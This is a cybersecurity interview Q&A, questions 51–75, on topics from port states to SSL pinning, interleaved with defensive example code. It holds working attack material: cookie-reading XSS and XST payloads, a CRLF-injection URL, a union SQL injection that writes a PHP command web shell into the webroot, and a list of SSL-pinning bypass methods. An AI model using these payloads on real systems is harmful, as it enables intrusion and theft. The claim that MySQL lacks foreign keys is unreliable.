
51) Do you prefer filtered ports or closed ports on your firewall?

Closed Port:
- If you send a SYN to a closed port, it will respond back with a RST.
Open Port:
- If you send a SYN to an open port, you would expect to receive a
SYN/ACK.
Filtered Port:
- Presumably, the host is behind some sort of firewall. If the packet is discarded and there is
no response, this is typically considered a filtered port.
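
The three port states above, observed from the client side, as an added example that is not part of the original page. It maps the outcome of a TCP connect to open/closed/filtered and compares the result with an intended firewall policy; `classify_port`, `audit_policy` and the sample policy are names and values assumed for illustration.

```python
import errno
import socket


def classify_port(host, port, timeout=2.0):
    """Classify one TCP port as 'open', 'closed' or 'filtered'.

    connect() sends the SYN for us:
      SYN/ACK comes back -> connect() succeeds      -> open
      RST comes back     -> ConnectionRefusedError  -> closed
      nothing comes back -> the timeout expires     -> filtered
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError as exc:
        # A filtering device may answer with ICMP unreachable instead of silence.
        if exc.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH):
            return "filtered"
        raise
    finally:
        sock.close()


def audit_policy(host, expected, timeout=2.0):
    """Compare observed port states with the intended firewall policy.

    expected maps port -> intended state. Returns (port, intended, observed)
    for every port that does not behave as the policy says.
    """
    mismatches = []
    for port, intended in sorted(expected.items()):
        observed = classify_port(host, port, timeout)
        if observed != intended:
            mismatches.append((port, intended, observed))
    return mismatches


if __name__ == "__main__":
    # Constructed policy for a host you administer: SSH reachable, telnet dropped.
    policy = {22: "open", 23: "filtered"}
    for port, intended, observed in audit_policy("127.0.0.1", policy):
        print(f"port {port}: policy says {intended}, observed {observed}")
```
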

52) What are the three ways to authenticate a person?


Three common ways to authenticate a person:
1. Something you know (e.g. password)
Anything a user must know in order to log in: ID, password, PIN.
2. Something you have (e.g. token)
Anything a user must have in his possession to log in: one-time password (OTP) tokens,
smartphones with OTP apps, employee ID card.
3. Something you are (e.g. fingerprint/biometric)
Biological traits a user has that are confirmed for login: retina scan, fingerprint scan,
facial recognition, voice recognition.

53) What are your steps when securing a server?

You can make your server more secure in 4 simple steps.


Step 1
The first thing to do is make sure that you have a secure password for your root and
administrator users. Conventional wisdom says use a mix of letters, numbers, and some
punctuation characters. Unfortunately, while that is sound advice to a point, it omits a vital
element – the password length.
Step 2
The next thing you need to do is make new users on your system. These will be the users you
use to manage the system. If you are the only person using the server, your name or
nickname are as good a username as any. If a group of people is going to be using it, then you
probably already have a username convention that you use elsewhere. On Windows, give the
user administrator access and add the user to the Remote Desktop Users group; on
Linux, add the user to sudoers. Log out and then log in as your newly created user and check
that you do have sufficient administrator/root access. If that works, move on to the next step.
Step 3
Remove remote access from the default root/administrator accounts.

Step 4
The next step is to configure your firewall rules for remote access.

54) What is more important for cybersecurity professionals to focus on, threats or
vulnerabilities?

- It is important to focus on both. Vulnerability is about finding loopholes in the system, and
threats make us understand how to deal with a real-time problem or attack in the
system. So vulnerability is more important: find the loopholes in the system and fix them
to secure the network.

55) What is the goal of information security within an organization?


The three security goals are confidentiality, integrity, and availability.

- Protect the confidentiality of data
- Preserve the integrity of data
- Promote the availability of data for authorized use

These goals form the confidentiality, integrity, availability (CIA) triad, the basis of all security
programs. Information security professionals who create policies and procedures must
consider each goal when creating a plan to protect a computer system.

1. Confidentiality: Whenever information is transmitted from one place to another, a
certain level of secrecy is maintained, which is known as confidentiality.

2. Integrity: This means that whenever there is a need to change any document, whether stored
beforehand or new, it can only be done by an authorized person with a proper and secure
mechanism.

3. Availability: Everything that is important should be readily available to the authorized
people; otherwise there is no use in information that is not available.

56) What is the difference between threat, vulnerability, and a risk?


A threat is from an attacker that will use a vulnerability that was not mitigated because
someone forgot to identify it as a risk.
1. Vulnerability: If your security program has a breach or weakness, then different threats
can further exploit the program and thus hack into your system to access data that is stored
securely.
2. Risk: If your system is not secure enough and has a chance of being damaged or
destroyed, along with loss of data, when a threat exploits the vulnerability, it is under huge
risk.
3. Threat: Something that is necessary for exploiting the vulnerability, either knowingly or
by accident, in order to damage or destroy personal and official data.

57) What is the difference between Vulnerability Assessment and Penetration Testing?

There is a considerable amount of confusion in the industry regarding the differences
between vulnerability scanning and penetration testing, as the two phrases are commonly
interchanged. However, their meaning and implications are very different. A vulnerability
assessment simply identifies and reports noted vulnerabilities, whereas a penetration test
(Pen Test) attempts to exploit the vulnerabilities to determine whether unauthorized access
or other malicious activity is possible.

58) What is Vulnerability Assessment?

Vulnerability assessment is the process of defining, identifying, classifying and prioritizing
vulnerabilities in computer systems, applications and network infrastructures and providing
the organization doing the assessment with the necessary knowledge, awareness and risk
background to understand the threats to its environment and react appropriately.
Conducting vulnerability assessments helps organizations identify vulnerabilities in their
software and supporting infrastructure before a compromise can take place.
A vulnerability can be defined in two ways:
- A bug in code or a flaw in software design that can be exploited to cause harm. Exploitation
may occur via an authenticated or unauthenticated attacker.
- A gap in security procedures or a weakness in internal controls that, when exploited, results
in a security breach.

59) What is Penetration Testing?

Penetration testing (also called pen testing) is the practice of testing a computer system,
network or Web application to find vulnerabilities that an attacker could exploit.

Pen tests can be automated with software applications or they can be performed manually.
Either way, the process includes gathering information about the target before the test
(reconnaissance), identifying possible entry points, attempting to break in (either virtually
or for real) and reporting back the findings.

60) What is cross site tracing (XST)?


XST attacks are a way to bypass HTTP-Only protection.
Cross Site Tracing (XST) attacks are a form of Cross Site Scripting (XSS) attacks that exploit
the TRACE method of the HTTP protocol.
XST is a combined attack that uses the HTTP TRACE method together with XSS
techniques.
How to test if your server is vulnerable to XST

To test if your server is vulnerable I will use Burp Suite. Open Burp and choose Repeater.
Change the request to something similar to:

TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>

The reply should look like this if TRACE is enabled:

HTTP/1.1 200 OK
Date: Sun, 23 Sep 2007 02:48:05 GMT
Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>

Cross Site Tracing

Well guys, first of all I need a web server to send the request to, so for this I'm
gonna use my localhost on port 81. Let's try to access it via curl.

curl -X TRACE 192.168.1.3:81

OK, now let's see what is in the response.

Umph, as we can see TRACE in the response, this method is allowed. Now let's try to add a
new header, which we can do by using curl's -H option.

Oh, injected :P So this application is prone to XSS attacks via the TRACE method, which in short is
called Cross Site Tracing. If we don't see TRACE in the response and see a source page, then the TRACE
method is disabled.
Defenses

Prevention of this vulnerability is really simple. If you're using Apache, then you need to
install the mod_rewrite engine. Add the following lines to your httpd.conf file.

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

If you're using IIS, then you need to filter out everything but GET, POST, and HEAD
with UrlScan.
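
To confirm that the rewrite rule took effect, the TRACE test above can be scripted with a harmless random marker in place of the script tag. This is an added example, not code from the original page; the header name `X-Trace-Probe`, the function names and the sample responses are assumptions constructed for illustration.

```python
import secrets
import socket

PROBE_HEADER = "X-Trace-Probe"  # hypothetical header name, used only by this check


def build_trace_request(host, marker):
    """TRACE request carrying a harmless random marker instead of script."""
    return (
        "TRACE / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"{PROBE_HEADER}: {marker}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def status_and_body(raw):
    """Split raw response bytes into (status code, body); status 0 if unparsable."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.decode("iso-8859-1").split("\r\n")[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return status, body


def trace_verdict(raw, marker):
    """'enabled' : 200 and our header is echoed back in the body
    'blocked' : the server refused the method (403, 405 or 501)
    'no-echo' : any other answer, e.g. a normal page without the marker"""
    status, body = status_and_body(raw)
    if status == 200 and marker.encode("ascii") in body:
        return "enabled"
    if status in (403, 405, 501):
        return "blocked"
    return "no-echo"


def probe(host, port, timeout=5.0):
    """Send the TRACE request to a server you administer and return the verdict."""
    marker = secrets.token_hex(8)
    with socket.create_connection((host, port), timeout=timeout) as conn:
        conn.sendall(build_trace_request(host, marker))
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_verdict(b"".join(chunks), marker)


# Constructed sample responses (not captured from a real server).
SAMPLE_MARKER = "probe-7f3a"
SAMPLE_ECHO = (
    b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\nConnection: close\r\n\r\n"
    b"TRACE / HTTP/1.1\r\nHost: 192.168.1.3\r\nX-Trace-Probe: probe-7f3a\r\n\r\n"
)
SAMPLE_FORBIDDEN = b"HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n\r\nForbidden"
SAMPLE_PAGE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>index</html>"


def check_samples():
    """Verdicts for the three constructed responses, in order."""
    return [trace_verdict(raw, SAMPLE_MARKER)
            for raw in (SAMPLE_ECHO, SAMPLE_FORBIDDEN, SAMPLE_PAGE)]


if __name__ == "__main__":
    print(check_samples())
```

With the `[F]` rewrite rule in place, a probe of the server should report `blocked` (403 Forbidden) instead of `enabled`.
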

61) What is Self XSS?

Self-XSS is one of the popular social engineering attacks used by attackers to trick users into
pasting malicious code into the browser. It results in the attacker gaining access to whatever website
you visit. Usually scammers use this attack to trick users into buying products or to get money
through online surveys.
JavaScript can be executed in the browser URL bar.
For example, enter the following code in your browser:

javascript:alert('BreakTheSecurity');

This will show a pop-up box with “BreakTheSecurity”. An attacker can use this for
malicious purposes. He can steal confidential data and cookies, redirect to malware sites and
more.
For example, entering the following code will display the cookies in your browser:

javascript:alert("Cookies:"+document.cookie+" "+"\n By \n BreakTheSecurity");

The above code is not going to do anything malicious other than displaying the cookies. But
an attacker can extend the script so that it can take advantage of your data.
Security Tips from BreakTheSecurity:

- Use the NoScript add-on, which will prevent JavaScript from running in your browser.
- Don’t click shortened URLs, for example bit.ly/55ewEb?22. They may redirect to
infected sites.

Be aware of social engineering:

- If anyone asks you (even if he is your friend) to paste scripts into the browser bar, never
do it.
- If anyone says “iPhone only $10”, don’t be eager to click it.
- If anyone says “1000 shares will cure a baby”, never fall for it. Facebook shares
never help to get money or to cure a baby.
- Read our EHN spam report to know the latest updates about Facebook scams.

62) What is the impact of clickjacking attack?

Clickjacking is a method of tricking website users into clicking on a harmful link, by
disguising the link as something else.

It tricked the user into “Liking” an item on Facebook. Clickjacking has also been used in the
past to:

- Harvest login credentials, by rendering a fake login box on top of the real one.
- Trick users into turning on their web-cam or microphone, by rendering invisible
elements over the Adobe Flash settings page.
- Spread worms on social media sites like Twitter and MySpace.
- Promote online scams by tricking people into clicking on things they otherwise would
not.
- Spread malware by diverting users to malicious download links.

Also, when a web site is vulnerable to clickjacking, it is possible for the attacker to disable
cross-site request forgery (CSRF) token protection, which protects against CSRF attacks that
trick browsers into doing things without the user’s knowledge or permission.
ClickJacking as a method of delivery for Blind XSS.
This vulnerability can be linked to a multitude of attacks including keylogging and stealing
user credentials.

63) What is Blind XSS?

It is a type of stored XSS where the attacker's input is saved by the server and is reflected in a totally
different application used by a system admin/team member.

Impact

There are many different attacks that can be leveraged through the use of cross-site
scripting, including:
- Hijacking a user's active session.
- Mounting phishing attacks.
- Intercepting data and performing man-in-the-middle attacks.

64) What is CRLF or HTTP Response splitting?
When a browser sends a request to a web server, the web server answers back with a
response containing both the HTTP headers and the actual website content. The HTTP
headers and the HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line feed. For short they
are also known as CRLF.
The server knows when a new header begins and another one ends with CRLF, which can
also tell a web application or user that a new line begins in a file or in a text block.
In a CRLF injection attack, the attacker inserts both the carriage return and line feed
characters into user input to trick the server, web application or user into thinking
that an object has terminated and another one has started.
A CRLF injection vulnerability is a web application vulnerability that arises when user-entered
data is passed directly to response header fields (such as Location and Set-Cookie) without
proper sanitisation, which can result in various forms of security exploits. Security exploits
range from XSS, cache poisoning and cache-based defacement to page injection, etc.

CRLF injection, or HTTP response splitting, is a type of injection attack that can lead to Cross-
site Scripting (XSS) and web cache poisoning among others.
CRLF refers to the Carriage Return and Line Feed sequence of special characters. These two
special characters represent the End of Line (EOL) marker for many internet protocols,
including HTTP. Web applications typically split headers based on where the CRLF character
sequence is found. Therefore, if a malicious user is able to inject their own CRLF sequence
into an HTTP stream, they gain control over the contents of the HTTP response.
Since CRLF characters can be used to split an HTTP response header, it is often also referred
to as HTTP Response Splitting. The following example is a crafted request containing CRLF
(the %0d%0a characters in the request below) that causes Cross-site Scripting.

http://www.yoursite.com/somepage.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

The victim will see the following in their browser.

<script>alert(1)</script>

Variations of this attack can be used to poison proxy or web caches in order to get the cache
to serve the attacker’s content to other users.
Impacts of the CRLF injection Vulnerability
The impacts of CRLF injection vary, and range from all the impacts of Cross-site Scripting to
information disclosure. It can also deactivate certain security restrictions like XSS filters and
the Same Origin Policy in the victim's browser, leaving them susceptible to malicious
attacks.
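
The header-splitting mechanism described above, shown as a vulnerable response builder beside a hardened one. This is an added example, not code from the original page; the redirect handler, its function names and the sample parameter values are constructed for illustration.

```python
from urllib.parse import unquote


def _redirect(page):
    """Assemble a 302 response whose Location header ends with the given value."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /" + page + "\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def redirect_unsafe(page_param):
    """Vulnerable: the URL-decoded parameter goes straight into the header."""
    return _redirect(unquote(page_param))


def redirect_safe(page_param):
    """Hardened: reject CR, LF and NUL before the value reaches a header."""
    page = unquote(page_param)
    if any(ch in page for ch in "\r\n\x00"):
        raise ValueError("control character in header value")
    return _redirect(page)


def header_names(response):
    """Header field names as a client would parse them from the header block."""
    head = response.partition("\r\n\r\n")[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:]]


def body_of(response):
    """Everything after the first empty line, i.e. what a client treats as body."""
    return response.partition("\r\n\r\n")[2]


def is_rejected(page_param):
    """True if the hardened builder refuses the parameter."""
    try:
        redirect_safe(page_param)
    except ValueError:
        return True
    return False


# Constructed inputs: a normal value, one that adds a header line, and one
# that ends the header block early so the rest is parsed as the body.
BENIGN = "home"
EXTRA_HEADER = "home%0d%0aSet-Cookie:%20session=constructed"
SPLIT_BODY = "home%0d%0a%0d%0a<b>constructed body</b>"


if __name__ == "__main__":
    for value in (BENIGN, EXTRA_HEADER, SPLIT_BODY):
        response = redirect_unsafe(value)
        print(header_names(response), repr(body_of(response)), is_rejected(value))
```

In the unsafe builder the second input yields a `Set-Cookie` header the application never set, and the third pushes the real `Content-Length` header into the body; the hardened builder refuses both.
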
65) How to Upload Shells from SQL injection?
File Upload with SQL Injection

If we find union-based SQL injection, we can upload a file to the server. To upload a file, we
should know the directory structure of the server.
As I said, we need to know the directory structure or root path of the server, and usually we will see
the directory structure in SQL errors.
Example SQL Error:
Warning: mysql_fetch_assoc() expects parameter 2 to be resource, boolean given in
C:\wamp\www\db_connect.php on line 136
In this example, the web server is running in “C:\wamp\www”. The SQL query which uploads a
basic CMD shell is given below.

Example SQL Query:
select "<? system($_GET['cmd’]);?>" into outfile "C:/wamp/www/shell.php"
Now it’s time to merge the SQL query with the SQL injection.
File Upload Example:
URL : http://www.example.com/product.php?id=5 union all select "<?
system($_GET['cmd’]); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
SQL Query : select * from products where id=5 union all select "<? system($_GET['cmd’]);
?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php”--
The shell file is ready to be used. We can reach the shell file at http://www.example.com/shell.php .

Command Execution - "ipconfig"

Command Execution - "whoami"

If command execution via SQL injection is not enough for you, try it with Metasploit.

66) What is the difference between MySQL and MS SQL?

- MySQL and MS SQL are two database systems.
- MySQL is open source while MS SQL is closed source.
- MySQL is free to use, while MS SQL requires payment for a license to use.
- MySQL uses lower disk space; MS SQL uses higher disk space.
- MySQL is cross-compatible with other platforms such as Unix and Linux.
- MS SQL is not compatible with other platforms.
- MySQL does not support foreign keys while MS SQL supports their use.

67) What is a buffer overflow attack?
A buffer overflow, or buffer overrun, is a common software coding mistake that an attacker
could exploit to gain access to your system.
A buffer overflow occurs when more data is written to a buffer than it can hold. The excess
data is written to the adjacent memory, overwriting the contents of that location and causing
unpredictable results in a program. Buffer overflows happen when there is improper
validation (no bounds checking) prior to the data being written. It is considered a bug or weakness in
the software.
A buffer is a temporary area for data storage. When more data (than was originally allocated
to be stored) gets placed by a program or system process, the extra data overflows. It causes
some of that data to leak out into other buffers, which can corrupt or overwrite whatever
data they were holding.
In a buffer-overflow attack, the extra data sometimes holds specific instructions for actions
intended by a hacker or malicious user; for example, the data could trigger a response that
damages files, changes data or unveils private information.
This vulnerability can cause a system crash or, worse, create an entry point for a cyberattack.
C and C++ are more susceptible to buffer overflow.
Attackers can exploit a buffer overflow bug by injecting code that is specifically tailored to
cause buffer overflow with the initial part of a data set, then writing the rest of the data to
the memory address adjacent to the overflowing buffer. The overflow data might contain
executable code that allows the attackers to run bigger and more sophisticated programs or
grant themselves access to the system.
There are two types of buffer overflows: stack-based and heap-based. Heap-based, which are
difficult to execute and the least common of the two, attack an application by flooding the
memory space reserved for a program. Stack-based buffer overflows, which are more
common among attackers, exploit applications and programs by using what is known as a
stack: memory space used to store user input.

68) What are Encryption, Decryption, Key & Steganography?

Encryption: It is the process of locking up information using cryptography. Information that
has been locked this way is encrypted.
Decryption: The process of unlocking the encrypted information using cryptographic
techniques.
Key: A secret like a password used to encrypt and decrypt information. There are a few
different types of keys used in cryptography.
Steganography: It is actually the science of hiding information from people who would snoop
on you. The difference between steganography and encryption is that the would-be snoopers
may not be able to tell there’s any hidden information in the first place.
69) What are differences between Symmetric & Asymmetric Encryption?

Symmetrical Encryption

This is the simplest kind of encryption, involving only one secret key to cipher and
decipher information. Symmetrical encryption is an old and best-known technique. It uses a
secret key that can be a number, a word or a string of random letters. The key is blended
with the plain text of a message to change the content in a particular way. The sender and
the recipient should both know the secret key that is used to encrypt and decrypt all the messages.
Blowfish, AES, RC4, DES, RC5, and RC6 are examples of symmetric encryption. The most
widely used symmetric algorithms are AES-128, AES-192, and AES-256.

The main disadvantage of the symmetric key encryption is that all parties involved have to
exchange the key used to encrypt the data before they can decrypt it.

Asymmetrical Encryption

Asymmetrical encryption, also known as public key cryptography, is a relatively new
method compared to symmetric encryption. Asymmetric encryption uses two keys to
encrypt a plain text. Secret keys are exchanged over the Internet or a large network. It
ensures that malicious persons do not misuse the keys. It is important to note that anyone
with a secret key can decrypt the message, and this is why asymmetrical encryption uses two
related keys to boost security. A public key is made freely available to anyone who might
want to send you a message. The second, private key is kept secret so that only you
know it.

A message that is encrypted using a public key can only be decrypted using a private key,
while a message encrypted using a private key can be decrypted using a public key.
Security of the public key is not required because it is publicly available and can be passed
over the internet. Asymmetric keys have far better power in ensuring the security of
information transmitted during communication.

Asymmetric encryption is mostly used in day-to-day communication channels, especially
over the Internet. Popular asymmetric key encryption algorithms include ElGamal, RSA,
DSA, elliptic curve techniques, and PKCS.

Asymmetric Encryption in Digital Certificates

To use asymmetric encryption, there must be a way of discovering public keys. One typical
technique is using digital certificates in a client-server model of communication. A certificate
is a package of information that identifies a user and a server. It contains information such
as an organization’s name, the organization that issued the certificate, the user’s email
address and country, and the user’s public key.

When a server and a client require a secure encrypted communication, they send a query
over the network to the other party, which sends back a copy of the certificate. The other
party’s public key can be extracted from the certificate. A certificate can also be used to
uniquely identify the holder.

SSL/TLS uses both asymmetric and symmetric encryption; quickly look at digitally signed
certificates issued by trusted certificate authorities (CAs).

70) What are the differences between SSL & TLS?

Secure Socket Layer (SSL) and Transport Layer Security (TLS) are protocols designed to
provide security between the web server and web browser.
- The TLS protocol does not support Fortezza/DMS cipher suites while SSL supports
Fortezza. Also, the TLS standardization process makes it much easier to define new
cipher suites.
- In SSL, the message digest of the pre-master secret is used to create a master secret.
In contrast, TLS uses a pseudorandom function to generate the master secret.
- The SSL record protocol adds a MAC (Message Authentication Code) after compressing
each block and encrypts it. In contrast, the TLS record protocol uses HMAC (Hash-based
Message Authentication Code).
- The “No certificate” alert message is included in SSL. On the other hand, TLS removes
the alert description (No certificate) and adds a dozen other values.
- SSL message authentication unites key information and application data in an ad-hoc
manner, created just for the SSL protocol, whereas the TLS protocol just relies on a
standard message authentication code known as HMAC.
- In the TLS certificate verify message, the MD5 and SHA-1 hashes are computed
only over handshake messages. On the contrary, in SSL the hash calculation also
includes the master secret and pad.
- The finished message in TLS is created by applying the PRF to the master key
and handshake messages, whereas in SSL it is constructed by applying a message
digest to the master key and handshake messages.

71) What does an IPA file contain?

Similar to an APK for Android applications, an IPA is an archive which contains the iOS
application. Files with the .ipa extension can be extracted with the unzip utility to give us the
contents in the form of a Payload/AppName.app folder.

Contents in an IPA

- Payload - Contains the .app folder of the specific iOS application. Under the .app folder we
can see the application’s contents like the images, nib files which store the user interface and
so on.
- Mach-O Executable - Mach Object files are file formats for executables.
Contains data section, header and load commands.
- Info.plist - Stores the configuration information of the executable. Can be
viewed with a text editor. If it is in a binary format, it can be converted using
plutil -convert xml1 Info.plist
- Frameworks - Folder with libraries the application uses. There are many
third-party libraries, for example the AWS SDK.
- Mobileprovision - Information such as the developer certificate, devices
for which the application is provisioned or team identifier can be found
under embedded.mobileprovision

72) What are the types of local storages in an iOS application?

Here we will explore local iOS data storage guidelines for iOS apps intended to keep certain
information locally. Local storage is meant for retaining web app data locally using certain
frameworks, tools and methods distinctive to different platforms. For iOS storage there are
different methods to choose from. The choice, however, depends upon what and how much
data you want to store. Most of the time more than one method is required to implement
local storage in iOS apps, as there are different persistence needs of the application, viz. data
gathered from web browsing, user preferences, and application settings. The most widely
used methods for local storage implementation in iOS are:
- SQLite
- Property List
- Core Data
- NSUserDefaults
- Key Chain

SQLite for iOS Local Data Storage
SQLite is a powerful lightweight C library that is embedded in an iOS application. This is used
in various applications across various platforms including Android and iOS. It uses SQL-
centric API to operate the data tables directly. Using SQLite C library for local data storage
implementation in iOS applications, one needs to be very meticulous when passing in strings
and arguments required for the functions.
Property List
Another very common method of storing data in an iOS application is in Property List files.
Documents in a property list contain either an NSDictionary or an NSArray, inside which there
is archived data. There are a number of classes that can be archived into the PList, viz. NSArray,
NSDate, NSString, NSDictionary and NSdictionary. Objects other than these cannot be
archived as a property list and will not be able to write the file. One has to be very particular
about listing items into the classes; for instance, to store a Boolean or Integer object, only the
NSNumber class is used. A Boolean or Integer object must not be given to any objects in
NSDictionary or NSArray.
Core Data
Core Data is the method recommended by Apple for local storage of an app’s data. By default,
Core Data uses SQLite as its main database in the iOS app. Internally Core Data makes use of
SQLite queries to save and store its data locally, which is why all the files are stored as .db
files. This also eliminates the need to install a separate database. In iOS this framework
allows for two different database storage types, but by default it is SQLite. Core Data allows
you to deal with common functionalities of an app like restore, store, undo and redo.

NSUserDefaults
NSUserDefaults is one of the most common methods of local data storage for saving properties
and user preferences in any application. This is used to save the logged-in state of the user
within an application, so that the app can fetch this data even when the user accesses the
application at some other time. In some iOS apps this method is used to save the user’s
confidential information like an access token.
Key Chain
Most of the time developers avoid implementing the key chain method to save data as the
method follows a complicated procedure. If the device is jailbroken, none of your data is
secure. This is the most secure and reliable method to store data on a non-jailbroken device.
Simple wrapper classes are used to store data using the key chain method.
73) What is ssl pinning?
SSL Pinning is making sure the client checks the server’s certificate against a known copy of
that certificate. Simply bundle your server’s SSL certificate inside your application, and make
sure any SSL request first validates that the server’s certificate exactly matches the bundle’s
certificate. SSL pinning prevents someone from using a false SSL certificate to breach the
trust between users, developers, and applications.
Typically, during the SSL or TLS handshake, when a client connects to a server, the server
sends its digital certificate. If the certificate is issued by a Certificate Authority that is trusted
by the mobile device OS, the connection is allowed. The data is sent through the connection,
and is encrypted with the server’s public key. This process establishes a trust relationship.
An attacker performing a “man in the middle” attack makes the mobile device trust the
attacker’s certificate. Typically, an attacker's certificate is not signed by a Certificate
Authority trusted by the mobile device OS, but there is no certainty. In iOS 4.3.5, there was a
vulnerability where "an attacker with a privileged network position" could capture or modify
data in sessions that were protected by SSL/TLS.
BENEFITS
Increased security - with pinned SSL certificates, the app is independent of the device’s
trust store. Compromising the hard coded trust store in the app is not so easy - the app would
need to be decompiled, changed and then recompiled again - and it can’t be signed using the
same Android keystore that the original developer of the app used.
Reduced costs - SSL certificate pinning gives you the possibility to use a self-signed
certificate that can be trusted. For example, you’re developing an app that uses your own API
server. You can reduce the costs by using a self-signed certificate on your server (and pinning
that certificate in your app) instead of paying for a certificate. Although a bit convoluted, this
way, you've actually improved security and saved yourself some money.
DRAWBACKS
Less flexibility - when you do SSL certificate pinning, changing the SSL certificate is not that
easy. For every SSL certificate change, you have to make an update to the app, push it to
Google Play and hope the users will install it.
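
The pinning check described above, written as an added example that is not part of the original page: the client hashes the certificate the server presents and compares it with fingerprints bundled in the app. The function names, the `use_system_trust` switch for the self-signed case and the stand-in certificate bytes are assumptions made for illustration; comparing SHA-256 fingerprints stands in for "exactly matches the bundled certificate".

```python
import hashlib
import hmac
import socket
import ssl


def fingerprint(der_cert):
    """Hex SHA-256 of the DER-encoded certificate."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert, pinned):
    """True if the certificate's fingerprint equals one of the bundled pins.

    Pins may be written with colons and in either case. Every pin is compared
    in constant time, with no early exit.
    """
    actual = fingerprint(der_cert)
    matched = False
    for pin in pinned:
        normalised = pin.replace(":", "").lower()
        if hmac.compare_digest(actual, normalised):
            matched = True
    return matched


def connect_pinned(host, port, pinned, use_system_trust=True, timeout=5.0):
    """Open a TLS connection and keep it only if the server certificate is pinned."""
    context = ssl.create_default_context()
    if not use_system_trust:
        # Self-signed server certificate: the pin is the only trust decision.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
    raw = socket.create_connection((host, port), timeout=timeout)
    try:
        tls = context.wrap_socket(raw, server_hostname=host)
    except Exception:
        raw.close()
        raise
    der_cert = tls.getpeercert(binary_form=True)
    if der_cert is None or not pin_matches(der_cert, pinned):
        tls.close()
        raise ssl.SSLError("server certificate does not match a pinned fingerprint")
    return tls


# Constructed stand-in for certificate bytes; a real app bundles the
# fingerprint of its own server certificate.
SAMPLE_DER = b"constructed stand-in for DER certificate bytes"
BUNDLED_PINS = [fingerprint(SAMPLE_DER)]


if __name__ == "__main__":
    print(pin_matches(SAMPLE_DER, BUNDLED_PINS))            # certificate that was bundled
    print(pin_matches(SAMPLE_DER + b"\x00", BUNDLED_PINS))  # any other certificate
```

Accepting a list of pins lets a replacement certificate's fingerprint ship in the app before the server certificate is changed, which eases the flexibility drawback noted above.
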

74) How to bypass ssl pinning?

- Disable certificate pinning in code by decompiling the APK and compiling it again.
- Disable SSL pinning with a special tool on your phone (SSL Kill Switch).
- Disable SSL pinning with the IPAPatch tool for iOS.
- Adding a custom CA to the trusted certificate store
- Overwriting a packaged CA cert with a custom CA cert
- Using Frida to hook and bypass SSL certificate checks
- Reversing custom certificate code

75) What is AAA?
Authentication is the process of identifying an individual, usually based on a username and
password. Authentication is based on the idea that each individual user will have unique
information that sets him or her apart from other users.
Authorization is the process of granting or denying a user access to network resources once
the user has been authenticated through the username and password. The amount of
information and the amount of services the user has access to depend on the user's
authorization level.
Accounting is the process of keeping track of a user's activity while accessing the network
resources, including the amount of time spent in the network, the services accessed while
there and the amount of data transferred during the session. Accounting data is used for
trend analysis, capacity planning, billing, auditing and cost allocation.

AAA services often require a server that is dedicated to providing the three services. RADIUS
is an example of an AAA service.
